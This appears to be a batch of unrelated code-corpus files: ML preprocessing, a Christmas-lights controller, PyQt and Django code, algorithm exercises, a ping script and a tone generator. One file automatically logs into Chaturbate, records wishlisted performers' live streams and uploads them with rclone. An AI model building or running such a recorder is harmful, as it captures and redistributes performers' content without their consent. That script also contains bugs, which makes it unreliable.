])\nchange1_test=campaign_age_unknown_trans()\ntrain=handle_pipeline.fit_transform(train)\ntest=change1_test.fit_transform(test)\n\nnum_list=['age','campaign','pdays','previous','emp.var.rate','cons.price.idx','cons.conf.idx','euribor3m','nr.employed','contacts_daily']\ntrain_num_group=train[num_list]\ntest_num_group=test[num_list]\nnum_imp=SimpleImputer(strategy='mean')\ntrain_num_group=num_imp.fit_transform(train_num_group)\ntest_num_group=num_imp.fit_transform(test_num_group)\nstd_=StandardScaler()\ntrain_num_group=std_.fit_transform(train_num_group)\ntest_num_group=std_.fit_transform(test_num_group)\n\ntrain=train.drop(num_list,axis=1)\ntest=test.drop(num_list,axis=1)\nencoder_columns=list(train.columns)[:-1]\none_hot_train=train[encoder_columns]\nimp=SimpleImputer(strategy='most_frequent')\none_hot_train=imp.fit_transform(one_hot_train)\none_hot_test=imp.transform(test)\none_hot=OneHotEncoder(handle_unknown='ignore')\none_hot_train=one_hot.fit_transform(one_hot_train)\none_hot_test=one_hot.transform(one_hot_test)\none_hot_train=one_hot_train.toarray()\none_hot_test=one_hot_test.toarray()\ntrain_data=np.concatenate([train_num_group,one_hot_train],axis=1)\ntest_data=np.concatenate([test_num_group,one_hot_test],axis=1)\ntrain_label=train['y'].replace({'yes':True,'no':False})\n\n\n# %%\nclf = LogisticRegression()\nbest_clf = GridSearchCV(clf,scoring='roc_auc',cv=5,n_jobs=-1,\n param_grid={'C': [0.001,0.01,0.1,1,10,100]})\nbest_clf.fit(train_data,train_label)\nprint(\"Select best Logistic Regression model with C = {} with best_score={}\".format(\n best_clf.best_params_['C'],\n best_clf.best_score_))\n\n# %%\nclf = LogisticRegression(C=1)\nclf.fit(train_data,train_label)\ntest_ans=clf.predict_proba(test_data)\nans=pd.DataFrame(test_ans,columns=['prob_False','prob_True'])\nans.to_csv('./data/ans.csv')\ntest_label_lr=clf.predict(test_data)\ntest_label_lr=pd.DataFrame(test_label_lr,columns=['label'])\ntest_label_lr.to_csv('./data/testlabel_lr.csv')\n# %%\n","sub_path":"individualproject/first_way_predict.py","file_name":"first_way_predict.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"607261956","text":"'''Setup and start a XmasBox instance.'''\nimport subprocess\nimport time\n\nimport xmasbox\nimport xmasbox.displays\nimport xmasbox.config\nimport xmasbox.inputs\nfrom xmasbox.cheer import CheerCommand\n\nimport lights.cli\nimport lights.colour.correction as lcc\nimport lights.action.effects as lae\n\n\nclass ColourFadeCommand(xmasbox.Command):\n '''Command to run ColourFadeEffect'''\n def __init__(self):\n super().__init__(\"Colour Fade\")\n self._effect = None\n\n def run(self, light_string):\n colour_names = [\"red\", \"green\", \"blue\"]\n colours = []\n for colour_name in colour_names:\n colours.append(lights.colour.from_name(colour_name))\n\n self._effect = lae.ColourFadeEffect(light_string, colours,\n cycle_time=10)\n self._effect.start()\n\n def stop(self):\n if self._effect is not None:\n self._effect.stop()\n\n\nclass RainbowCommand(xmasbox.Command):\n '''Command to create a rainbow effect.'''\n def __init__(self):\n super().__init__(\"Rainbow\")\n self._effect = None\n\n def run(self, light_string):\n colour_names = [\"red\", \"green\", \"blue\"]\n colours = []\n for colour_name in colour_names:\n colours.append(lights.colour.from_name(colour_name))\n\n self._effect = lae.GradientEffect(light_string, colours,\n cycle_time=10)\n self._effect.start()\n\n def stop(self):\n if self._effect is not None:\n self._effect.stop()\n\n\nclass ClearCommand(xmasbox.Command):\n '''Command to clear the string of lights.'''\n def __init__(self):\n super().__init__(\"Clear\")\n\n def run(self, light_string):\n light_string.clear()\n light_string.show()\n\n def stop(self):\n pass\n\nclass ShutdownCommand(xmasbox.Command):\n '''Command to shutdown the computer.'''\n def __init__(self):\n super().__init__(\"Shutdown\")\n\n def run(self, light_string):\n light_string.clear()\n light_string.show()\n subprocess.call(\"sudo shutdown -h now\", shell=True)\n\n def stop(self):\n pass\n\n\nclass RebootCommand(xmasbox.Command):\n '''Command to reboot the computer.'''\n def __init__(self):\n super().__init__(\"Reboot\")\n\n def run(self, light_string):\n light_string.clear()\n light_string.show()\n subprocess.call(\"sudo shutdown -r now\", shell=True)\n\n def stop(self):\n pass\n\n\ndef main():\n '''Initialise and run an XmasBox instance.'''\n # Get config file options\n config = xmasbox.config.get_config(\"config.ini\")\n\n # Get command line options\n parser = lights.cli.get_light_options()\n\n displays = [\"scroll_phat\", \"micro_dot_phat\"]\n parser.add_argument(\"-d\", \"--display\", type=str.lower,\n help=\"Select display: %s\" % \" \".join(displays),\n choices=displays)\n args = parser.parse_args()\n\n # Override config file options\n xmasbox.config.cli_override(config, args)\n\n # Get lights and display from options\n light_string = xmasbox.config.lights_from_config(config)\n\n # Adjust for RGB LED Brightness variations\n light_string = lcc.ColourTunerWrapper(light_string)\n\n # Add output\n command_output = xmasbox.config.get_output(config)\n\n # Setup Xmas Box\n box = xmasbox.XmasBox(light_string, command_output=command_output)\n\n fade_command = ColourFadeCommand()\n shutdown_command = ShutdownCommand()\n clear_command = ClearCommand()\n reboot_command = RebootCommand()\n rainbow_command = RainbowCommand()\n cheer_command = CheerCommand()\n box.add_command(fade_command)\n box.add_command(rainbow_command)\n box.add_command(cheer_command)\n box.add_command(clear_command)\n box.add_command(reboot_command)\n box.add_command(shutdown_command)\n\n # XXX Something is causing the command to not run properly on startup\n # I suspect it's something to do with timing, so wait a few seconds\n # before starting it.\n time.sleep(5)\n\n box.run_current()\n\n # Create input loop\n input_handler = xmasbox.inputs.ButtonInput(box)\n\n input_handler.loop()\n\nif __name__ == '__main__':\n main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"310526297","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nHADES\r\nDiálogo Grupos\r\n\r\nCreated on Wed Sep 9 14:27:24 2020\r\n\r\n__author__ = Pedro Biel\r\n__version__ = 0.0.0\r\n__email__ = pbiel@taimweser.com\r\n\"\"\"\r\n\r\n\r\nfrom PyQt5 import uic\r\nfrom PyQt5.QtWidgets import QAbstractScrollArea, QDialog\r\n\r\n# from dlg_grupos.controlador.cnt_grupos import CntGruposDialogo\r\n\r\n\r\nclass DlgGrupos(QDialog):\r\n \r\n def __init__(self, parent=None, df=None, model=None):\r\n \"\"\"\r\n Diálogo Grupos de la aplicación.\r\n \r\n Para pasar datos de QMainWindow a QDialog:\r\n https://stackoverflow.com/questions/14309703/passing-parameter-from-main-window-to-pop-up-qdialog-window\r\n \"\"\"\r\n \r\n QDialog.__init__(self, parent)\r\n uic.loadUi('dlg_grupos/vista/dlg_grupos.ui', self)\r\n \r\n self.df = df # self.v.df_grupos\r\n self.model = model\r\n \r\n # Widgets PyQt5.\r\n self.lbl_1 = self.label_1\r\n self.lbl_2 = self.label_2\r\n self.lbl_3 = self.label_3\r\n self.tbl = self.tableView\r\n self.btn_aceptar = self.pushButtonAceptar\r\n \r\n # Título de la ventana.\r\n self.setWindowTitle('Grupos')\r\n \r\n # Altura mínima de la ventana.\r\n self.setMinimumHeight(500)\r\n \r\n # Texto de etiquetas.\r\n self.lbl_1.setText(\r\n 'Indicar Grupo para cada Caso y Nombre correspondiente.'\r\n )\r\n self.lbl_2.setText(\r\n 'Casos y Nombres sin un Grupo asignado no se tendrán en cuenta.'\r\n )\r\n self.lbl_3.setText(\r\n 'Modificaciones de los datos en Caso y Nombre pueden influir en el \\\r\nresultado final.'\r\n )\r\n \r\n # Modelo de la tabla.\r\n self.tbl.setModel(self.model)\r\n # Ajusta el ancho de las columnas a los contenidos.\r\n self.tbl.setSizeAdjustPolicy(QAbstractScrollArea.AdjustToContents)\r\n self.tbl.resizeColumnsToContents()\r\n \r\n # Botones.\r\n self.btn_aceptar.setText('Aceptar cambios')\r\n self.btn_aceptar.setShortcut('Ctrl+A')\r\n self.btn_aceptar.setToolTip('Acepta los cambios en la tabla | Ctrl+A')\r\n \r\n # Instancias de clase.\r\n # self.cnt_grupos = CntGruposDialogo(self)\r\n \r\n # Eventos.\r\n self.btn_aceptar.clicked.connect(self.acepta_cambios)\r\n \r\n def acepta_cambios(self):\r\n \"\"\"\r\n Acepta los cambios realizados en la QTableView y cierra el diálogo.\r\n \"\"\"\r\n \r\n self.reject()\r\n \r\n print('\\ndf_grupos:')\r\n print(self.df)\r\n \r\n # def rechaza_cambios(self):\r\n # \"\"\"\r\n # Rechaza los cambios realizados en la QTableView y cierra el diálogo.\r\n # \"\"\"\r\n \r\n # self.tbl.setModel(self.model)\r\n \r\n # def get_df(self):\r\n # \"\"\"Getter del DataFrame modificado.\"\"\"\r\n \r\n # self.df = self.acepta_cambios()\r\n\r\n # return self.df\r\n \r\n\r\n","sub_path":"Hades_1/dlg_grupos/dlg_grupos.py","file_name":"dlg_grupos.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"291405902","text":"#! /usr/bin/python3.4\n\"\"\"\nThe script extracts entries\ncontaining particuar word you specified (e.g. \"Penelope\")\nfrom RepeatModeler output file\n\"\"\"\nfrom Bio import SeqIO\nimport sys\nfilename = sys.argv[1]\ntry:\n f = open(filename)\nexcept IOError:\n print('file not found')\nextracted_sequences = []\nrep_name = input(\"Type your repeat name > \")\nfor record in SeqIO.parse(f, 'fasta'):\n if rep_name in record.id:\n extracted_sequences.append(record)\noutput = open(rep_name + '_consens.fasta', 'w')\nSeqIO.write(extracted_sequences, output, 'fasta')\noutput.close()\nprint('Done!\\nFound %i %s sequences' %(len(extracted_sequences), rep_name))\n","sub_path":"GetYourRepeat.py","file_name":"GetYourRepeat.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"28341755","text":"import time, datetime, os, sys, requests, configparser, re, subprocess\n#os.system(\"pip3 install livestreamer bs4 lxml gevent streamlink\")\nfrom bs4 import BeautifulSoup\nif os.name == 'nt':\n import ctypes\n kernel32 = ctypes.windll.kernel32\n kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)\n slash = \"\\\\\"\nelse:\n slash = \"/\"\nfrom queue import Queue\nfrom streamlink import Streamlink\nfrom threading import Thread\n\nConfig = configparser.ConfigParser()\nConfig.read(sys.path[0] + \"/config/config.conf\")\nsave_directory = Config.get('paths', 'save_directory')\nwishlist = Config.get('paths', 'wishlist')\ninterval = int(Config.get('settings', 'checkInterval'))\ngenders = re.sub(' ', '', Config.get('settings', 'genders')).split(\",\")\ndirectory_structure = Config.get('paths', 'directory_structure').lower()\npostProcessingCommand = Config.get('settings', 'postProcessingCommand')\nusername = Config.get(\"login\", \"username\")\npassword = Config.get(\"login\", \"password\")\ntry:\n postProcessingThreads = int(Config.get('settings', 'postProcessingThreads'))\nexcept ValueError:\n pass\ncompleted_directory = Config.get('paths', 'completed_directory').lower()\n\ndef now():\n return '[' + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") + ']'\n\nrecording = []\nwanted = []\n\ndef login():\n s.headers = {\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',\n 'referer': 'https://chaturbate.com/',\n 'origin': 'https://chaturbate.com',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-US,en;q=0.8',\n 'cache-control': 'max-age=0',\n 'upgrade-insecure-requests': '1',\n 'content-type': 'application/x-www-form-urlencoded',\n }\n\n\n data = {'username': username, 'password': password, 'next': ''}\n result = s.get(\"https://chaturbate.com/\")\n soup = BeautifulSoup(result.text, \"html.parser\")\n data['csrfmiddlewaretoken'] = soup.find('input', {'name': 'csrfmiddlewaretoken'}).get('value')\n\n result = s.post('https://chaturbate.com/auth/login/?next=/', data=data, cookies=result.cookies)\n if not checkLogin(result):\n print('Login failed. Check that your username and password is set correctly in the configuration file.')\n exit()\n else:\n print('Logged in successfully.')\n\n\ndef checkLogin(result):\n soup = BeautifulSoup(result.text, \"html.parser\")\n if soup.find('div', {'id': 'user_information'}) is not None:\n return True\n else:\n return False\n\ndef startRecording(model):\n global postProcessingCommand\n global processingQueue\n try:\n result = requests.get('https://chaturbate.com/api/chatvideocontext/{}/'.format(model)).json()\n session = Streamlink()\n session.set_option('http-headers', \"referer=https://www.chaturbate.com/{}\".format(model))\n streams = session.streams(\"hlsvariant://{}\".format(result['hls_source'].rsplit('?')[0]))\n stream = streams[\"best\"]\n fd = stream.open()\n now = datetime.datetime.now()\n filePath = directory_structure.format(path=save_directory, model=model, gender=result['broadcaster_gender'],\n seconds=now.strftime(\"%S\"),\n minutes=now.strftime(\"%M\"), hour=now.strftime(\"%H\"),\n day=now.strftime(\"%d\"),\n month=now.strftime(\"%m\"), year=now.strftime(\"%Y\"))\n directory = filePath.rsplit(slash, 1)[0]+slash\n if not os.path.exists(directory):\n os.makedirs(directory)\n if model in recording: return\n with open(filePath, 'wb') as f:\n recording.append(model)\n while model in wanted:\n try:\n data = fd.read(1024)\n f.write(data)\n except:\n f.close()\n break\n if postProcessingCommand:\n processingQueue.put({'model':model, 'path':filePath, 'gender':gender})\n elif completed_directory:\n finishedDir = completed_directory.format(path=save_directory, model=model,\n gender=gender, seconds=now.strftime(\"%S\"),\n minutes=now.strftime(\"%M\"),hour=now.strftime(\"%H\"), day=now.strftime(\"%d\"),\n month=now.strftime(\"%m\"), year=now.strftime(\"%Y\"))\n\n if not os.path.exists(finishedDir):\n os.makedirs(finishedDir)\n os.rename(filePath, finishedDir+slash+filePath.rsplit[slash,1][0])\n except: \n pass\n finally:\n os.system('rclone move \"{}\" milo:milo/b/MFC/\"{}\"'.format(filePath,model))\n if model in recording:\n recording.remove(model)\ndef postProcess():\n global processingQueue\n global postProcessingCommand\n while True:\n while processingQueue.empty():\n time.sleep(1)\n parameters = processingQueue.get()\n model = parameters['model']\n path = parameters['path']\n filename = path.rsplit(slash, 1)[1]\n gender = parameters['gender']\n directory = path.rsplit(slash, 1)[0]+slash\n subprocess.run(postProcessingCommand.split() + [path, filename, directory, model, gender])\n\ndef getOnlineModels():\n online = []\n global wanted\n s = requests.session()\n for gender in genders:\n try:\n data = {'categories': gender, 'num': 127}\n result = requests.post(\"https://roomlister.stream.highwebmedia.com/session/start/\", data=data).json()\n length = len(result['rooms'])\n online.extend([m['username'].lower() for m in result['rooms']])\n data['key'] = result['key']\n while length == 127:\n result = requests.post(\"https://roomlister.stream.highwebmedia.com/session/next/\", data=data).json()\n length = len(result['rooms'])\n data['key'] = result['key']\n online.extend([m['username'].lower() for m in result['rooms']])\n except:\n break\n f = open(wishlist, 'r')\n wanted = list(set(f.readlines()))\n wanted = [m.strip('\\n').split('chaturbate.com/')[-1].lower().strip().replace('/', '') for m in wanted]\n #wantedModels = list(set(wanted).intersection(online).difference(recording))\n '''new method for building list - testing issue #19 yet again'''\n wantedModels = [m for m in (list(set(wanted))) if m in online and m not in recording]\n for theModel in wantedModels:\n thread = Thread(target=startRecording, args=(theModel,))\n thread.start()\n f.close()\n\n\nif __name__ == '__main__':\n s = requests.session()\n result = s.get('https://chaturbate.com/')\n if not checkLogin(result):\n login()\n AllowedGenders = ['female', 'male', 'trans', 'couple']\n for gender in genders:\n if gender.lower() not in AllowedGenders:\n print(gender, \"is not an acceptable gender. Options are as follows: female, male, trans, and couple.\")\n print(\"Please correct your config file.\")\n exit()\n genders = [a.lower()[0] for a in genders]\n print()\n if postProcessingCommand != \"\":\n processingQueue = Queue()\n postprocessingWorkers = []\n for i in range(0, postProcessingThreads):\n t = Thread(target=postProcess)\n postprocessingWorkers.append(t)\n t.start()\n sys.stdout.write(\"\\033[F\")\n while True:\n sys.stdout.write(\"\\033[K\")\n print( now(),\"{} model(s) are being recorded. Getting list of online models now\".format(len(recording)))\n sys.stdout.write(\"\\033[K\")\n print(\"The following models are being recorded: {}\".format(recording), end=\"\\r\")\n getOnlineModels()\n sys.stdout.write(\"\\033[F\")\n for i in range(interval, 0, -1):\n sys.stdout.write(\"\\033[K\")\n print(now(), \"{} model(s) are being recorded. Next check in {} seconds\".format(len(recording), i))\n sys.stdout.write(\"\\033[K\")\n print(\"The following models are being recorded: {}\".format(recording), end=\"\\r\")\n time.sleep(1)\n sys.stdout.write(\"\\033[F\")\n","sub_path":"ChaturbateRecorder.py","file_name":"ChaturbateRecorder.py","file_ext":"py","file_size_in_byte":8375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"624075217","text":"from django.conf.urls import patterns, url\n\nurlpatterns = patterns('platform_core.institutes.views',\n\n # Institute list\n url(r'$', 'institute_list', name=\"institute_list\"),\n\n # Insitute details\n url(r'(?P\\w+)/$', 'institute_details',\n name=\"institute_details\"),\n # Chapter details\n url(r'(?P\\w+)/(?P\\w+)/$', 'chapter_details',\n name=\"chapter_details\"),\n\n # Institute Admin \n # url(r'^institute_admin/', include('platform_core.institute_admin.urls')),\n)\n","sub_path":"platform_core/institutes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"536375231","text":"#coding:utf-8\n\"\"\"\n33. N-Queens\n\nDescription\n\nThe n-queens puzzle is the problem of placing n queens on an n×n chessboard such that no two queens attack each other.\nGiven an integer n, return all distinct solutions to the n-queens puzzle.\nEach solution contains a distinct board configuration of the n-queens' placement, where 'Q' and '.' both indicate a queen and an empty space respectively.\n\n\nExample 1:\n\n\tInput:1\n\tOutput:\n\t [[\"Q\"]]\n\n\nExample 2:\n\n\tInput:4\n\tOutput:\n\t[\n\t // Solution 1\n\t [\".Q..\",\n\t \"...Q\",\n\t \"Q...\",\n\t \"..Q.\"\n\t ],\n\t // Solution 2\n\t [\"..Q.\",\n\t \"Q...\",\n\t \"...Q\",\n\t \".Q..\"\n\t ]\n\t]\n\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param: n: The number of queens\n @return: All distinct solutions\n \"\"\"\n def solveNQueens(self, n):\n # write your code here\n if n==0:\n return 0\n ret=[]\n self.dfs(n, 0, ret)\n return ret\n \n def dfs(self, n, index, ret, temp=[]): \n if index==n:\n m = self.tomap(n, temp)\n ret.append(m)\n s=[]\n for i in range(index):\n s.append(temp[i]+(index-i))\n s.append(temp[i]-(index-i))\n for i in range(n):\n if i not in (s+temp):\n temp.append(i)\n self.dfs(n,index+1,ret,temp)\n temp.pop()\n \n def tomap(self, n, temp):\n m=[]\n for i in temp:\n line = \".\"*i+\"Q\"+\".\"*(n-i-1)\n m.append(line)\n return m ","sub_path":"lintcode刷题/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"247137852","text":"def chunks(l, n):\r\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]\r\n\r\n\r\nclass TableRow:\r\n def __init__(self, isHeader=False, rno=-1, elementsPerRow=9999999999):\r\n self.isHeader = isHeader\r\n self.elements = []\r\n self.rno = rno\r\n self.elementsPerRow = elementsPerRow\r\n\r\n def addElement(self, element):\r\n self.elements.append(element)\r\n\r\n def getHTML(self):\r\n html = ''\r\n for elements in chunks(self.elements, self.elementsPerRow):\r\n html += ''\r\n if self.rno >= 0:\r\n html += '' + str(self.rno) + ''\r\n html += ''\r\n for e in elements:\r\n if self.isHeader or e.isHeader:\r\n elTag = 'th'\r\n else:\r\n elTag = 'td'\r\n html += '<%s>' % elTag + e.getHTML() + '' % elTag\r\n html += '\\n'\r\n return html\r\n","sub_path":"src/TableRow.py","file_name":"TableRow.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"475515323","text":"import datetime\n\nfrom django.utils import timezone\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\n\nfrom polls.models import Question\n\ndef create_question(question_text, days):\n\t\"\"\" Create a question with the given text, published the given\n\t\tnumber of days offset to now (negative for past publication dates,\n\t\tpositive for yet-to-publish questions) \"\"\"\n\ttime = timezone.now() + datetime.timedelta(days=days)\n\treturn Question.objects.create(question_text=question_text, pub_date=time)\n\nclass QuestionViewTests (TestCase):\n\tdef test_index_view_with_no_questions(self):\n\t\t\"\"\" If no questions exist, a msg should be displayed \"\"\"\n\t\tresponse = self.client.get(reverse('polls:index'))\n\t\tself.assertEqual(response.status_code, 200)\n\t\tself.assertContains(response, \"No polls are available.\")\n\t\tself.assertQuerysetEqual(response.context['latest_question_list'], [])\n\n\tdef test_index_view_with_future_question_and_past_question(self):\n\t\t\"\"\"\n\t\tEven if both past & future questions exist, only past questions should be displayed.\n\t\t\"\"\"\n\t\tcreate_question(question_text=\"Past question.\", days=-30)\n\t\tcreate_question(question_text=\"Future question\", days=30)\n\t\tresponse = self.client.get(reverse('polls:index'))\n\t\tself.assertQuerysetEqual(\n\t\t\tresponse.context['latest_question_list'],\n\t\t\t['']\n\t\t)\n\n\tdef test_index_view_with_two_past_question(self):\n\t\t\"\"\"\n\t\tThe questions index page should display multiple questions.\n\t\t\"\"\"\n\t\tcreate_question(question_text=\"Past question 1.\", days=-30)\n\t\tcreate_question(question_text=\"Past question 2.\", days=-5)\n\t\tresponse = self.client.get(reverse('polls:index'))\n\t\tself.assertQuerysetEqual(\n\t\t\tresponse.context['latest_question_list'],\n\t\t\t['', '']\n\t\t)\n\nclass QuestionMethodTests (TestCase):\n\tdef test_was_published_recently_with_future_question(self):\n\t\t\"\"\" was_published_recently() should return False for questions \n\t\t\twith pub_date in the future \"\"\"\n\t\ttime = timezone.now() + datetime.timedelta(days=30)\n\t\tfuture_question = Question(pub_date=time)\n\t\tself.assertEqual(future_question.was_published_recently(), False)\n\n\tdef test_was_published_with_old_question(self):\n\t\t\"\"\" was_published_recently() should return False for questions\n\t\t\twhose pub_date is older than a day \"\"\"\n\t\ttime = timezone.now() - datetime.timedelta(days=30)\n\t\told_question = Question(pub_date=time)\n\t\tself.assertEqual(old_question.was_published_recently(), False)\n\n\tdef test_was_published_with_new_question(self):\n\t\t\"\"\" was_published_recently() should return False for questions\n\t\t\twhose pub_date is older than a day \"\"\"\n\t\ttime = timezone.now() - datetime.timedelta(hours=1)\n\t\tnew_question = Question(pub_date=time)\n\t\tself.assertEqual(new_question.was_published_recently(), True)","sub_path":"polls/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"483068213","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# wmd_launcher.py\n#\n# Copyright 2013 Brandon Knight \n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of the nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\nimport alsaaudio\nimport sys\nimport time\nfrom math import pi, sin\nfrom numpy import arange # like range, but supports floating point\n\nA = 440\nD = 293.66\nF = 349.23\nC = 523.25\nC4 = 261.63\nC3 = 130.81\nB = 493.88\nD5= 587.33\nG = 392.00\nC4 = 261.63\nD4 = 293.66\nE4 = 329.63\nGab4 = 415.30\nG3 = 196.0\nB2 = 123.47\nB3_flat = 233.08\nA3 = 220.00\nD4l = 311.13\nsong_of_time_notes = [A, A, D, D, D, D, F, F, A, A, D, D, D, D, F, F, A, C, B, B, G, G, F, G, A, A, D, D, C4, E4, D, D, D, D]\n\nclass FrequencyGenerator:\n\tdef __init__(self, channels = 2, sample_size = 1, frame_rate = 44100, period_size = 11025):\n\t\tself.channels = channels\n\t\tself.sample_size = sample_size\n\t\tself.frame_size = self.channels * self.sample_size\n\t\tself.frame_rate = frame_rate\n\t\tself.byte_rate = self.frame_rate * self.frame_size # bytes per second\n\t\tself.period_size = period_size\n\n\t\tself.pcm = alsaaudio.PCM(alsaaudio.PCM_PLAYBACK)\n\t\tself.pcm.setchannels(self.channels)\n\t\tself.pcm.setformat(alsaaudio.PCM_FORMAT_U8)\n\t\tself.pcm.setrate(self.frame_rate)\n\t\tself.pcm.setperiodsize(self.period_size)\n\n\tdef quantize(self, f): # map (-1..1) -> [0..256)\n\t\treturn int((f+1)*127) # depends on PCM format\n\n\tdef sine_wave(self, freq):\n\t\twave = [chr(self.quantize(sin(x))) * self.channels for x in arange(0, 2*pi, 2*pi / (self.frame_rate/freq))]\n\t\twave_data = \"\".join(wave) + \"\".join(wave)\n\t\t(nwaves, extra_bytes) = divmod(self.period_size * self.frame_size, len(wave_data))\n\t\tself.pcm.write((wave_data * nwaves) + wave_data[:extra_bytes])\n\n\tdef play_zelda(self):\n\t\tzelda = [C4, C4, G3, G3, G3, G3, C4, C4, D4, D4l, F, G]\n\t\tfor note in zelda:\n\t\t\tself.sine_wave(note)\n\n\tdef zelda_secret(self):\n\t\tG = 783.99\n\t\tFs = 739.99\n\t\tDs = 622.25\n\t\tGs = 415.30\n\t\tE = 659.26\n\t\tHGs = 830.61\n\t\tHC = 1046.50\n\t\tsecret = [G, Fs, Ds, A, Gs, E, HGs, HC]\n\t\tfor note in secret:\n\t\t\tself.sine_wave(note)\n\ndef main():\n\tt = FrequencyGenerator()\n\tt.zelda_secret()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"wmd/FrequencyGenerator.py","file_name":"FrequencyGenerator.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"183652529","text":"#!/usr/bin/python3\n# -*- coding: utf8 -*-\n# no_thread_ping_call.py host ...\n\n# NB : c'est le SHELL qui affiche les lignes de la cde ping\n# (le script python n'intercepte pas les lignes de résultat, mais seulemt le code retour)\n\nfrom sys import argv, stdin, stdout, stderr\nfrom subprocess import call, DEVNULL\nfrom os.path import basename\n\nif len(argv[1:]) == 0:\n stderr.write('Usage: ' + basename(argv[0]) + ' host ...\\n')\n exit(1)\n\ndelai = 3 # 3 sec.\n\nfor hote in argv[1:]:\n # on lance la cde unix ping pour interroger hote\n # (option -w pour arrêter apres un certain délai sinon ping \"boucle\")\n\n # nb: on récupère ds la variable le code retour de la cde ping\n # (cad la valeur de $? du shell)\n\n retour = call(['/bin/ping', '-w' + str(delai), hote]) # commande 'ping' lancée ds un \n # sous-processus et en avant-plan\n # idem : retour = call('/bin/ping -w' + str(delai) + ' ' + hote, shell=True) \n\n # __ si on ne veut pas de trace du déroulement de ping, ni message d'erreur__\n # retour = call(['ping', '-w' + str(delai), hote], stdout=DEVNULL, stderr=DEVNULL) \n # __ __\n\n print('*' * 40) \n if retour == 0: \n print(hote, ': VIVANT')\n elif retour == 1: \n print(hote, ': DEFAILLANT ?')\n else:\n print(hote, ': INCONNU')\n print('*' * 40)\n","sub_path":"src/Loïc/TP2/sce/no_thread_ping_call.py","file_name":"no_thread_ping_call.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"558348559","text":"class Solution(object):\n def findOrder(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: List[int]\n \"\"\"\n self.graph = {}\n self.deq = collections.deque()\n self.inDegree = {}\n \n for c in range(numCourses):\n self.graph[c] = set()\n self.inDegree[c] = 0\n \n for c, p in prerequisites:\n self.graph[c].add(p)\n self.inDegree[p] += 1\n \n for c, d in self.inDegree.items():\n if not d:\n self.deq.append(c)\n \n sort = []\n while self.deq:\n c = self.deq.popleft()\n sort.append(c)\n for p in self.graph[c]:\n self.inDegree[p] -= 1\n if not self.inDegree[p]:\n self.deq.append(p)\n \n if len(sort) != numCourses:\n return []\n else:\n sort.reverse()\n return sort\n \n \n","sub_path":"210. Course Schedule II/solution-kahns.py","file_name":"solution-kahns.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"565565775","text":"from ToolPack import tools\nfrom 